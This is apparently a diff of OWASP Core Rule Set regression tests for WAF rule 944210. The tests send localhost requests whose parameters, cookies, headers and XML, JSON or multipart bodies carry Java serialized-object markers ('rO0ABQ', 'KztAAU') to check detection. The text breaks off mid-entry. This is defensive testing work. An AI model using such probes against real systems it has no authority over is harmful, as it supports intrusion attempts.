"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 
944210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-15 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-16 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; 
name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-17 + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-18 + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: 
+ log_contains: "id \"944210\"" + - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 23 desc: "XML element includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: 
"POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
